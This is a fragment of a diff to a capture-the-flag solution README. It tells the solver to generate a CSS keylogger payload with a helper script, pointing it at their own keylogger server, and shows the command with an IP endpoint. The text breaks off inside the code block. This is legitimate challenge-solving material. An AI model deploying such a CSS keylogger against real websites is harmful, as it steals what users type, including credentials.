athack-ctf/chall2025-insecure-by-design/solution/README.md

 Now follow these instructions:

-- Generate css keylogger payload using the helper script `make-css-keylogger.py` providing your .
+- Generate css keylogger payload using the helper script `make-css-keylogger.py` providing the endpoint for your keylogger server (keep reading, it will make sense)

     ```
     python make-css-keylogger.py http://172.22.209.203:3000